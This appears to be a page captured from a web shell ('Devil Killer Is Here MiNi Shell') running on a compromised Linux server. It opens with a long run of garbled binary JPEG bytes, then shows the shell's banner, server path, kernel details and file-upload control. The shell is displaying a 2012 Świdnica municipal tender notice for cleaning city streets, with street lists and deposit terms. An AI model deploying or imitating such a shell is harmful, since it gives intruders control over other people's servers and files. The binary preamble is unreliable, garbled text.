JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120131/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120131/28770-N-2012.html

<p class="kh_header"><b>Świdnica: Oczyszczanie w sezonach letnich i zimowych dróg gminnych miasta Świdnica, na których częściowo dopuszczono prawo parkowania samochodów</b><br>
<b>Numer ogłoszenia: 28770 - 2012; data zamieszczenia: 31.01.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Prezydent Miasta Świdnicy , ul. Armii Krajowej 49, 58-100 Świdnica, woj. dolnośląskie, tel. 074 8562850, faks 074 8523110.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.swidnica.bip-gov.info.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Oczyszczanie w sezonach letnich i zimowych dróg gminnych miasta Świdnica, na których częściowo dopuszczono prawo parkowania samochodów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres prac obejmuje:

- oczyszczanie dróg w Rynku i strefie centralnej miasta ( zadanie A )
- oczyszczanie dróg w strefie śródmiejskiej i peryferyjnej miasta ( zadanie B )
SZCZEGOŁOWY OPIS PRZEDMIOTU ZAMÓWIENIA                        
                                                       
ZADANIE A Oczyszczanie dróg w Rynku i strefie centralnej miasta.

1. Oczyszczanie dróg  w Rynku i strefie centralnej miasta będzie realizowane poprzez
zamiatanie, zbieranie odpadów komunalnych oraz usuwanie odchodów zwierzęcych 

2. Oczyszczanie  będzie  prowadzone przez cały rok z wyjątkiem dni w których będą 
występowały niekorzystne warunki atmosferyczne np. duże opady deszczu, śniegu lub niskie temperatury. W takich warunkach Zamawiający może zawiesić wszystkie prace w zakresie oczyszczania lub tylko prace w zakresie zamiatania.

3. W sezonie letnim zamiatanie dróg powinno być zakończone do godz. 6.30
( za okres letni uważa się okres od 01 marca do 30 listopada danego roku kalendarzowego).
W sezonie zimowym zamiatanie dróg  powinno być zakończone do godz. 9.00.
( za okres zimowy uważa się okres od  01 grudnia danego roku kalendarzowego do ostatniego dnia m-ca lutego roku następnego).
W sezonie letnim i zimowym oczyszczanie dróg  polegające na zbieraniu odpadów komunalnych powinno być wykonywane w godzinach popołudniowych
od 14.00 do 16.00 z wyjątkiem niedziel, w których prace należy wykonywać w godzinach rannych od 7.00 do 9.00. 
Usuwanie odchodów zwierzęcych będzie wykonywane  zarówno w czasie przewidzianym dla prac w zakresie zamiatania jak również zbierania odpadów komunalnych

4. W uzasadnionych przypadkach Zamawiający pozostawia sobie prawo zmiany harmonogramu prac w zakresie oczyszczania ulic.
   
5. Oczyszczanie w sezonie letnim

Zakres prac jest następujący:

a/oczyszczanie jezdni, chodników, placów, ciągów pieszo -jezdnych poprzez zamiatanie wszelkich nieczystości  oraz usuwaniu odchodów zwierzęcych. 
Przedmiar prac oraz częstotliwość zamiatania zawiera rozdział 24 SIWZ zadanie A pkt  1 i 2.

b/ oczyszczanie jezdni, chodników, placów, zatok  poprzez zbieranie odpadów komunalnych 
( kubki, szkło, tworzywa sztuczne, papiery itp. ) oraz usuwanie odchodów zwierzęcych.
Przedmiar prac oraz częstotliwość oczyszczania zawiera rozdział 24 SIWZ zadanie A  
pkt 3 i 4.

6. Oczyszczanie  w sezonie zimowym

W okresie zimowym w zależności od panujących warunków atmosferycznych
Zamawiający będzie decydował o rodzaju podejmowanych prac w zakresie oczyszczania jezdni, chodników, placów, zatok, ciągów pieszo - jezdnych w Rynku i strefie centralnej miasta. 

Zakres prac jest następujący:

                                                             -23-
a/ w okresie bezśnieżnym przy występowaniu sprzyjających warunkach atmosferycznych  prace będą realizowane w sposób opisany jak w pkt  5 a i b. 
                                                            
b/ w czasie utrzymywania się pokrywy śnieżnej prace polegające na zbieraniu odpadów komunalnych opisane w pkt. 5 b będą wykonywane na pisemne polecenie Dyrektora  Departamentu Komunikacji.
Polecenie będzie zawierało informację dotyczącą przedmiaru robót i terminu wykonania. 
   
c/oczyszczanie w okresie zaniechania czynnej akcji ZUD lub zakończenia akcji związanej z zimowym utrzymaniem dróg polegać będzie na  usunięciu z powierzchni jezdni, zatok, placów, ciągów pieszo- jezdnych zalegających środków uszarstniających i innych nieczystości. 
Wykaz dróg do realizacji prac w ramach zadania A pkt  6 c wraz z przedmiarem prac będzie określał Zamawiający na podstawie dokonywanych  wspólnie z Wykonawcą przeglądów stanu czystości terenów położonych w pasie drogowym.

Termin wykonania prac o których mowa w pkt 6 c.
- w przypadku kiedy zaniechana została akcja ZUD będzie określał
Zamawiający, jednakże nie będzie on dłuższy niż 7 dni.
-  w przypadku kiedy zostały  zakończone działania związane z zimowym utrzymaniem dróg będzie określał Zamawiający, jednakże nie będzie on dłuższy niż 14 dni.  


Zadanie B Oczyszczanie dróg w strefie śródmiejskiej i peryferyjnej miasta

1. Oczyszczanie dróg w strefie śródmiejskiej i peryferyjnej będzie realizowane poprzez zamiatanie wszelkich nieczystości.

2. Oczyszczanie  będzie  prowadzone przez cały rok z wyjątkiem dni w których będą 
występowały niekorzystne warunki atmosferyczne np. duże opady deszczu, śniegu lub niskie temperatury. W takich warunkach Zamawiający może zawiesić wszystkie prace w zakresie  zamiatania.

3. W okresie  letnim zamiatanie dróg powinno być zakończone do godz 6.30 ( za okres letni uważa się okres od 01 marca  do 30 listopada  danego roku kalendarzowego ).
W okresie zimowym zamiatanie dróg powinno być zakończone do godz. 9.00.    
( za okres zimowy uważa się okres od 01 grudnia danego roku kalendarzowego do ostatniego dnia m-ca  lutego roku następnego ).
W uzasadnionych przypadkach Zamawiający pozostawia sobie prawo zmiany harmonogramu prac w zakresie oczyszczania ulic.

4. Oczyszczanie w sezonie  letnim polega na zamiataniu wszelkich nieczystości z powierzchni jezdni, zatok, parkingów. 

Przedmiar prac i częstotliwość zamiatania zawiera rozdział 24 SIWZ zadanie B pkt. 1 i 2.

5. Oczyszczanie w sezonie zimowym

Zakres prac jest następujący:

                                                           -24-

a/ w okresie bezśnieżnym przy występowaniu sprzyjających warunkach atmosferycznych  prace będą realizowane w sposób opisany jak w pkt  4.

b/ oczyszczanie jezdni i zatok parkingowych w okresie zaniechania czynnej akcji ZUD lub zakończenia akcji związanej z zimowym utrzymaniem dróg  polegać będzie na usunięciu z powierzchni jezdni, zatoki parkingowej zalegających środków uszarstniających i innych  nieczystości.
 Wykaz dróg do realizacji prac w ramach zadania B pkt.5 b wraz z przedmiarem prac będzie określał Zamawiający na podstawie dokonywanych wspólnie z Wykonawcą przeglądów stanu czystości jezdni.

Termin wykonania prac o których mowa w pkt. 5 b
-w przypadku kiedy została zaniechana akcja zimowe utrzymanie dróg będzie określał Zamawiający, jednakże nie będzie on dłuższy niż 10 dni
- w przypadku kiedy zostały zakończone działania związane z  zimowym utrzymaniem dróg będzie określał Zamawiający, jednakże nie będzie on  dłuższy 21 dni. 
 
W okresie zimowym w zależności od panujących warunków atmosferycznych Zamawiający będzie decydował o rodzaju podejmowanych prac w zakresie oczyszczania jezdni w strefie śródmiejskiej i peryferyjnej miasta.

Prace o których mowa w zadaniu B będą wykonywane zgodnie z harmonogramem z wyjątkiem niedziel i dni świątecznych .
Prace przewidziane do wykonania w dni świąteczne będą wykonane w pierwszych dwóch dniach  roboczych występujących po dniu świątecznym
24. WYKAZ  DRÓG GMINNYCH  DO  OCZYSZCZANIA  NA  KTÓRYCH
CZĘŚCIOWO  DOPUSZCZONO PRAWO PARKOWANIA  SAMOCHODÓW
 

ZADANIE A RYNEK I STREFA CENTRALNA

1.Częstotliwość zamiatania - 5 razy w tygodniu ( poniedziałki, środy czwartki, piątki i soboty )

                                                                                                                      powierzchnia w m2 

1) Rynek - jezdnia						-		  5753
2) Rynek - chodniki						-		  4866
3) Świętokrzyska - ciąg pieszy				-		   346
4) Łukowa - jezdnia i ciąg pieszo-jezdny			-		  1451
5) Zaułek Kupiecki - ciąg pieszo jezdny			-		   469
6) Plac przed Halą Targową	wraz
 z przylegającym chodnikiem					-		   829
7) Pl. Grunwaldzki od Budowlanej do
   Al. Niepodległości - jezdnia					-		   452
8) Pl. Grunwaldzki- parking przed Sądem			-		   640
9) Franciszkańska - jezdnia 					-		  1011
10) Grodzka - jezdnia						-		  1384
11) Kotlarska - jezdnia wraz z przejściem
 Kotlarska/Grodzka 						-		  1797
                                                                                                                                  ________
Razem 										18 998 m2


2. Częstotliwość zamiatania - 2 razy w tygodniu ( poniedziałki i piątki )
 
                                                                                                                   powierzchnia w m2

1) Budowlana - jezdnia					-		  694 
2) Bohaterów Getta- jezdnia 					-		 1526
3) Daleka - jezdnia						-		  557
4) Spółdzielcza- jezdnia 					-		 2204
5) Siostrzana - jezdnia 					-		 1591
6) Konopnickiej - jezdnia					-		 5127
7) Mennicka - jezdnia						-		  539 
8) Teatralna - jezdnia						-	             1558
9) Pl. Św. Małgorzaty - jezdnia na wysokości
budynków 1-4, 5-6, 7-8, 10-14, 19-22	oraz 
pomiędzy skwerami przy Pub Bunkier			-		 5374                                                       
10) Żeromskiego - jezdnia między Kotlarską
a Budowlaną 							-	               823
11) Żeromskiego - jezdnia między Muzealną 
a Zamkową							-		 290
12) Żeromskiego - zatoka między budynkami 24-40		-		 770
13) Żeromskiego- zatoka między Kotlarską a Placem
Grunwaldzkim						-		 830
14) Pl. Grunwaldzki- zatoka od Klubu Bolko
do Apteki na Żeromskiego					-		 324

                                                       -26-
15) Pl. Grunwaldzki - parking przed WKU				-		1070
16) Al. Niepodległości- zatoka między Placem
Grunwaldzkim a Trybunalską					-		 692
17) Al. Niepodległości - zatoka między Placem
Grunwaldzkim a Nauczycielską					-		 577
18) Kościelna - jezdnia						-		3292
19) Dworcowa - jezdnia 						-		1551
20) Różana - jezdnia 							-		 895
21) Przechodnia - jezdnia 						-		 451
22) Komunardów - lewy pas jezdni
 od Zamkowej do Żeromskiego					-		1476
23) Szpitalna- jezdnia 							-		 977
24) Trybunalska- jezdnia						-		1098
25) Długa- jezdnia							-		3095 
26) Pułaskiego - jezdnia						-		3471
27) Środkowa - jezdnia 						-		543
28) Zamkowa - jezdnia 						-		1162
29) Pl. Jana Pawła II							-		1714
                                                                                                                                         _______
Razem                                                                                                                              44 271 m2 
                                                                                                                                                  													                                                                       
	 
3. Wykaz dróg do oczyszczania poprzez zbieranie 7 razy w tygodniu ( od poniedziałku do niedzieli)  odpadów komunalnych  ( folie, papiery, opakowania plastikowe, butelki itp. ) oraz 
usuwanie odchodów zwierzęcych

                                                                                                                             powierzchnia w m2

1) Rynek - jezdnia i chodniki						-		10619
2) Łukowa - jezdnia i ciąg pieszo-jezdny				-		 1451
3) Zaułek kupiecki - ciąg pieszo- jezdny				-		  469
4) Plac przed Halą Targową	wraz z przylegającym
 chodnikiem			                  				-		  829
5) Pl. Grunwaldzki - jezdnia od Budowlanej 
  do Al. Niepodległości oraz chodnik od Zaułka
  Kupieckiego do Klubu Bolko						-		  452
6) Wewnętrzna - jezdnia						-		  207
7) Świętokrzyska- ciąg pieszy 						-		  346
8) Pl. Grunwaldzki - parking przed Sądem				-		  640
9) Grodzka - jezdnia i chodniki					-		 2447
10) Franciszkańska - jezdnia i chodniki				-		 1633
11) Kotlarska - jezdnia i chodniki wraz z 
przejściem Kotlarska/Grodzka					-		 2884
12) Zamkowa - jezdnia i chodniki					-		 1976
13) Trybunalska - jezdnia i chodniki					-		 1866
14) Plac Jana Pawła II - jezdnia i chodniki
z wyłączeniem chodnika przy skwerze				-		 1906
15) Długa- jezdnia i chodniki						-		 7095	
16) Pułaskiego - jezdnia i chodniki					-		 5979	
17) Spółdzielcza- jezdnia i chodniki					-		 3267
18) Kościelna - jezdnia i chodniki
z wyjątkiem chodnika przy murze kościoła				-		 4979

                                                           -27-
19) Konopnickiej - jezdnia i chodniki
z wyłączeniem chodników przy skwerach			-		 7941                                                            
20) Dworcowa - jezdnia i chodniki				-	      	 2267
                                                           					          _______
Razem                                                     				           59 253 m2
                                                           


4. Wykaz dróg do oczyszczania poprzez zbieranie 5 razy w tygodniu ( poniedziałki, wtorki, czwartki, piątki i soboty ) odpadów komunalnych ( papiery, folie, opakowania plastikowe, 
butelki itp. ) oraz usuwanie odchodów zwierzęcych

                                                                                                                      powierzchnia w m2

1) Środkowa - jezdnia i chodniki				-		 829 
2) Budowlana - jezdnia i chodniki				-		1321
3) Boh. Getta- jezdnia i chodniki				-		2200
4) Daleka - jezdnia i chodniki					-		 748
5) Klasztorna - jezdnia					-		 165
6) Siostrzana -jezdnia, chodnik i zatoka			-		 736
7) Mennicka- jezdnia i chodnik				-		1006
8) Teatralna - jezdnia i chodnik				-		2358
9) Pl. Św. Małgorzaty - jezdnia i chodniki
przy budynkach 1-4, 5-6, 7-8, 10-14, 19-22			-		6279
10) Żeromskiego - chodnik i zatoka między
kotlarską a Pl. Grunwaldzkim				-		1334 
11) Żeromskiego - jezdnia między Kotlarską
a Budowlaną							-		 823
12) Żeromskiego - jezdnia między
Muzealną a Zamkową 					-		 290
13) Żeromskiego - chodnik po stronie 
budynków 8-16, 24-40						-		 833
14) Żeromskiego - zatoka między
budynkami 24-40						-		 770 
15) Al. Niepodległości - chodnik i zatoka 
między Pl. Grunwaldzkim a Trybunalską			-		1097
16) Al. Niepodległości - chodnik i zatoka 	
miedzy Pl. Grunwaldzkim a Nauczycielską			-		1067
17). Wałbrzyska - chodnik od Pl. Grunwaldzkiego 
do przejazdu kolejowego					-		 743
18) Szpitalna - jezdnia i chodnik				-		1572
19) Różana - jezdnia i chodnik				-		1528
20) Przechodnia - jezdnia i chodnik				-		 697
21) Komunardów - chodnik od Zamkowej 
do  Żeromskiego - lewa strona 				-		 773
22) Komunardów - chodnik od Konopnickiej 
do Ks. Bolko - prawa strona 					-		 886
23) ul. Komunardów - jezdnia od Zamkowej
do Żeromskiego						-		2600    
24) Pl. Grunwaldzki - chodnik od Żeromskiego
do Wałbrzyskiej  						-		  409
25) Pl. Grunwaldzki - parking i chodnik
 przed WKU							-		 1491

                                                           -28-
26) Pl. Grunwaldzki - chodnik i zatoka od 
Klubu Bolko do Apteki na Żeromskiego 				- 		  656
27) ul. Pańska - teren utwardzony					-		 1008
28) Kolejowa - plac linii autobusowej 31				-		1157
- chodnik od Wałbrzyskiej do Spacerowej - lewa str. drogi		-		 646 
29. Spacerowa - stanowiska dla autobusów oczekujących		-		  79
-  przystanek przy Składzie Materiałów Budowlanych		-		168
                                                            							_____                                                         
Razem                                                     					        36 269 m2
       									

ZADANIE B STREFA ŚRÓDMIEJSKA I PERYFERYJNA

WYKAZ DRÓG DO OCZYSZCZANIA

1. Częstotliwość zamiatania- dwa razy w tygodniu 

                                                                                                                              powierzchnia w m2

1) Klasztorna -jezdnia 					 	-	              165
2) Jagiellońska - jezdnia z zatokami					-		3824
3) Ks. Bolko -jezdnia z zatokami					-		2675
4) Ks. Agnieszki - jezdnia						-		1057
5) Równa -jezdnia							-		3265
6) Nauczycielska -jezdnia z zatokami					-		2640
7) Traugutta -jezdnia z zatokami					-		2440
8) Lelewela-jezdnia wraz z drogą dojazdową
   do Straży Pożarnej							-		3460
                                                           							_____
Razem                                                    						          19 526 m2

2.Częstotliwość zamiatania - jeden raz w tygodniu

1) Folwarczna -jezdnia						-		1028
2) Plac Drzymały -jezdnia						-		1986
3) Główna-jezdnia							-		1385
4) Kwiatowa -jezdnia							-		693
5) Wyspiańskiego -jezdnia						-		1530
6) Bracka -jezdnia							-		1139
7) Głowackiego - od Wałbrzyskiej do Niecałej
 - lewy pas jezdni wraz z parkingiem					-		2104
8) Pl. Tysiąclecia-jezdnia						-		1898
9) Boczna-jezdnia							-		1102
10) Tołstoja--jezdnia							-		2450
11) Langiewicza -jezdnia z zatokami					-		1146
12) Sienna -jezdnia							-		555
13) Plac przed Starostwem Powiatowym				-		4415
14) Miernicza	-jezdnia						-		588
15) Biberaska	-jezdnia						-		675
16) Boduena -jezdnia 							-	           1770
17) Stawki -jezdnia							-		651
18) Rycerska -jezdnia							-	           1120
19) Czwartaków -jezdnia						-		420

                                                             -29-

20) Warszawska -jezdnia						-		1148
21) Dębowa -jezdnia z zatokami					-		1216
22) Klonowa -jezdnia z zatokami					-		1704
23) Kołłątaja -jezdnia							-		1804
24) Świętojańska -jezdnia						-		1560
25) Poznańska	 -jezdnia						-		627
26) Słowackiego -jezdnia						-		1301
27) Kolejowa - plac linii autobusowej 31				-		1157
- chodnik od Wałbrzyskiej do Spacerowej - lewa str. drogi		-		 646 
28. Spacerowa - stanowiska dla autobusów oczekujących		-		  79
-  przystanek przy Składzie Materiałów Budowlanych		-		168
29) Bema -jezdnia z zatokami						-		1922
30) Brodatego	-jezdnia z zatokami					-		5642
31) Łokietka -jezdnia z zatokami					-		4529
32) Galla Anonima -jezdnia						-		1977
33) Długosza -jezdnia z zatokami					-		765
34) Niemcewicza -jezdnia						-		872
35) Księżnej Jadwigi Śląskiej	-jezdnia z zatokami			-		2314
36) Wałowa -jezdnia z zatokami					-		481
37) Waryńskiego -jezdnia z zatokami					-		9012
38) Paderewskiego -jezdnia z zatokami				-		4127 
39) Czecha - odcinek  jezdni od Paderewskiego 
do Kusocińskiego							-		310 
40) Jasińskiego-jezdnia z zatokami					-		1532
41) Wróblewskiego - jezdnia wraz zatokami
oraz droga dojazdowa do posesji 62-64				-		4428 	
42) Okrężna - odcinek jezdni od Kliczkowskiej
 do budynku nr 5							-		1185
43) Okrężna - zatoki parkingowe					-		467 
44) Słobódzkiego - jezdnia wraz z zatokami
- droga dojazdowa do posesji 48-50					-		4571
45) Dąbrowskiego - jezdnia wraz zatokami				-	           10091
46) Prądzyńskiego 
- od Wyszyńskiego do Dąbrowskiego - prawa 
strona jezdni z zatokami						-		3326
- miejsca parkingowe wokół wysepki koło
 wieży ciśnień 								-		1086
- odcinek jezdni wraz z zatokami od Langiewicza do 
Wyszyńskiego wraz z wjazdem przy budynku nr 13			-		2703 	
- wjazdy między budynkiem  43-69,79-107				-		1146 
47) Marcinkowskiego - od Riedla do E. Plater -
- prawa strona jezdni							-		3815
48) Plac  Piłsudskiego	-jezdnia wraz z zatokami			-		2992
49) Szymanowskiego -jezdnia						-		1227
50) Moniuszki -jezdnia						-		1270
51) Letnia -jezdnia							-		400
52) Francuska -jezdnia						-		672
53) Zamenhofa - parking przed budynkiem 49-51
oraz budynkiem 53-55							-		2148
54) Zamenhofa - parking przed przychodnią NZOZ			-		651
55) Podchorążych -jezdnia						-		1489
56) Hetmańska -jezdnia 						-		2128

                                                        -30-
57) Okulickiego - jezdnia przed Sądem 
Rejonowym								-		550
58) Rolnicza - zatoki							-		220
59) Piotra Skargi - jezdnia z zatokami				-	           1660 	 
60. Webera -jezdnia 			 				-	           1900
61. Pileckiego-jezdnia							-                      1751
62. Bulwar nad rzeką -jezdnia						-	          3696
63. Zygmuntowska -jezdnia						-	          1223
64.Okrężna - Westerplatte - parking przy galerii			-	          1210
65. Okrężna - jezdnia przy parkingu galerii                                         -	            494             						                                                        __________
Razem                                                   						   130 047 m2.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający w oparciu o art. 67 ust. 1 pkt. 6 ustawy PZP przewiduje  udzielenie zamówienia uzupełniającego stanowiącego nie więcej niż 3 % wartości zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.61.00.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> WYMAGANIA DOTYCZĄCE WADIUM:

11.1 Oferta powinna być zabezpieczona wadium w wysokości : 12 700 zł ( słownie:
dwanaście tysięcy siedemset złotych ).
11.2 Wadium winno zostać wniesione przed upływem terminu składania ofert, tj. przed 
09.02.2012  r. przed godz. 09.00.
11.3 Wadium może być wniesione w formach określonych w art. 45 ust. 6 ustawy Prawo zamówień publicznych, z tym, że:
a ) złożone w pieniądzu: przelewem na rachunek bankowy Zamawiającego w Banku PKO. 
S.A  I Oddział w Świdnicy  96 1240 1978 1111 0010 0166 5724. Kwota wadium wniesiona przelewem winna znaleźć się na rachunku bankowym zamawiającego przed upływem terminu składania ofert.   
b) złożone w gwarancjach ( bankowych, ubezpieczeniowych ):
z treści gwarancji winno wynikać bezwarunkowo ( na każde pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą ) zobowiązanie gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 46 ust. 5 ustawy Pzp tj. w przypadku gdy Wykonawca:                                                                                                        
- odmówi podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
- nie wniósł wymaganego zabezpieczenia umowy,
- zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy, a także gdy  w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, lub pełnomocnictw, chyba, że udowodni, że wynika to z przyczyn nie leżących po jego stronie,

                                                               -13-

c) złożone w innej niż pieniądz formie winno być złożone w kasie Zamawiającego jako depozyt, złożony  za potwierdzeniem , przed upływem terminu składania ofert.
d/ w przypadku złożenia wadium w formie innej niż pieniądz, dokument gwarancji/ poręczenia wadialnego winien pod rygorem odrzucenia oferty wskazywać wszystkie podmioty wspólnie ubiegające się o udzielenie zamówienia w rozumieniu art.23 ustawy Pzp. 

11.4. Dowód przelewu lub potwierdzenie depozytu należy dołączyć w oryginale do oferty ( w przypadku przelewu kserokopie odcinka D ).
11.5. Wszystkie formy wadium powinny mieć określoną ważność zgodną z okresem związania ofertą. Bieg terminu związania ofertą rozpoczyna się wraz z upływem terminu składania ofert.
11.6. Zamawiający zwraca wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania z wyjątkiem Wykonawcy , którego oferta została wybrana  jako najkorzystniejsza, z zastrzeżeniem jak w punkcie 11.9.
11.7  Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego. 
11.8	Zamawiający zwraca wadium , na wniosek Wykonawcy , który wycofał ofertę przed
upływem terminu składania ofert.
11.9  Jeżeli wadium wniesiono w pieniądzu , Zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego na którym było ono przechowywane,  pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.  
11.10  Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
a) odmówi podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
b) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy,
